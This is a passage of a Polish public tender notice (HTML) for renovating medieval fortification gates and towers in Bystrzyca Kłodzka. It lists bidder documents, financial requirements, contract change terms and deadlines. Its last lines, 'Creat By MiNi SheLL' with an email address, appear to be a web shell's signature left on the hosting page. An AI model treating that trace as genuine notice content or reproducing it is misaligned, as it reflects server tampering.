Przed podpisaniem umowy o wykonanie przedmiotu zamówienia Zamawiający zażąda od wybranego Wykonawcy przedłożenia: a) oryginału lub kserokopii poświadczonej za zgodność z oryginałem w/w uprawnień Kierownika budowy i kierownika robót oraz oryginału lub kserokopii zaświadczenia o przynależności tych osób do właściwej izby samorządu zawodowego, a także oryginału lub kserokopii opłaconego ubezpieczenia tych osób, jeżeli nie wynika to z zaświadczenia o przynależności do Izby Samorządu Zawodowego, b) oryginału lub kserokopii dokumentu poświadczającego posiadanie tytułu zawodowego  magistra sztuki lub świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo dyplom potwierdzający posiadane kwalifikacje zawodowe w zawodach w zakresie konserwacji i restauracji zabytków, przez osobę uprawnioną do prowadzenia prac konserwatorskich, zgodnie z wymogami określonymi w § 22 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165, poz. 987).  
Kserokopie w/w dokumentów muszą być poświadczone za zgodność z oryginałem przez Wykonawcę lub przez podmioty, których dotyczą te dokumenty w przypadku gdy dokumenty  dotyczą podmiotów, z zasobów których korzystać będzie Wykonawca w trakcie realizacji zamówienia, na podstawie art. 26 ust 2b ustawy P.z.p.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku znajdowania się Wykonawcy w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia Wykonawca musi wykazać, że posiada środki finansowe lub zdolność kredytową na kwotę: 300 000 zł. (słownie: trzysta tysięcy złotych). W tym celu Wykonawca musi załączyć do oferty: - informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę: 300 000 zł. (słownie: trzysta tysięcy złotych), dokument musi być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek powyższy zostanie spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać warunek łącznie.
Ocena  spełniania warunku dokonana  zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach. Nie załączenie w/w dokumentów będzie skutkowało odrzuceniem oferty lub wykluczeniem Wykonawcy z postępowania i jednoczesnym odrzuceniem  oferty , z zastrzeżeniem art. 26 ust. 3  ustawy P.z.p.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie złożone na podstawie art. 44 ustawy P.z.p., że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy P.z.p.; 2) Parafowany na każdej stronie przez Wykonawcę wzór Umowy, stanowiący Załącznik Nr 11 do SIWZ; 3) kosztorys ofertowy (oryginał, podpisany przez Wykonawcę), którego wartości (netto, VAT, brutto) muszą być zgodne z wartościami podanymi w ofercie; 4) kserokopia dokumentu potwierdzającego zabezpieczenie oferty akceptowalną formą wadium, potwierdzona za zgodność z oryginałem przez Wykonawcę; 5) pełnomocnictwo/ upoważnienie dla osoby uprawnionej do podpisania oferty, w przypadku, gdy umocowanie do reprezentowania Wykonawcy nie wynika ze stosownego dokumentu, a w szczególności z odpisu z właściwego rejestru - wzór upoważnienia stanowi Załącznik Nr 4 do SIWZ; 6) pisemne zobowiązanie podmiotów, o których  mowa w art. 26 ust. 2b P.z.p. do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonywaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W razie zaistnienia istotnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy można dokonać zmiany umowy.
1. Warunki zmiany terminu wykonania zamówienia: a) z powodu istotnych braków lub błędów w dokumentacji projektowej, polegających na niezgodności dokumentacji z przepisami prawa, b) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego, jeżeli te zmiany są korzystne dla Zamawiającego i wyraża na to zgodę Dolnośląski Wojewódzki Konserwator Zabytków, c) z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego Wykonawcę, robót, e) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, f) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron umowy.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania prac, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania prac  w miejscu budowy.
2. Warunki zmiany kluczowego personelu Wykonawcy a) Zamawiający dopuszcza możliwość zmiany w zawartej umowie w części dotyczącej zmiany kluczowego personelu Wykonawcy lub Zamawiającego, b) W przypadku zmiany kluczowego specjalisty przedstawionego w ofercie, nowy specjalista musi spełniać wymagania określone w SIWZ dla danego specjalisty, c) Zamawiający może żądać od Wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy, d) Zgodnie z żądaniem Zamawiającego Wykonawca zobowiązany jest zmienić kluczowego specjalistę w terminie wskazanym przez Zamawiającego.
3. W wypadku konieczności wykonania robót dodatkowych, które nie są objęte dokumentacją projektową a ich wykonanie jest konieczne aby zrealizować przedmiot umowy. 
4. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. Zamawiający w tym przypadku może od umowy odstąpić w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia w formie pieniężnej należnego mu z tytułu wykonania części umowy do momentu odstąpienia od umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-bystrzycaklodzka.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Bystrzycy Kłodzkiej, Wydział Turystyki, Mały Rynek 2/1, 57-500 Bystrzyca Kłodzka, w godz.: 8:00 - 16:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2012 godzina 09:30, miejsce: Urząd Miasta i Gminy w Bystrzycy Kłodzkiej, ul. H. Sienkiewicza 6, 57-500 Bystrzyca Kłodzka, pokój nr 1 (Biuro Obsługi Klienta). Otwarcie ofert: 16.07.2012 r. w UMiG.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie pn.: Remont i adaptacja na cele kultury i turystyki bram i baszt stanowiących elementy średniowiecznego systemu fortyfikacyjnego w Bystrzycy Kłodzkiej współfinansowane jest z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013, priorytet nr 9, Działanie 9.1, Odnowa zdegradowanych obszarów miejskich w miastach  powyżej 10 tysięcy mieszkańców.
W przypadku nie uzyskania przez Gminę Bystrzyca Kłodzka dofinansowania ze środków  EFRR dla przedmiotowego zadania,  zamówienie nie będzie realizowane.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com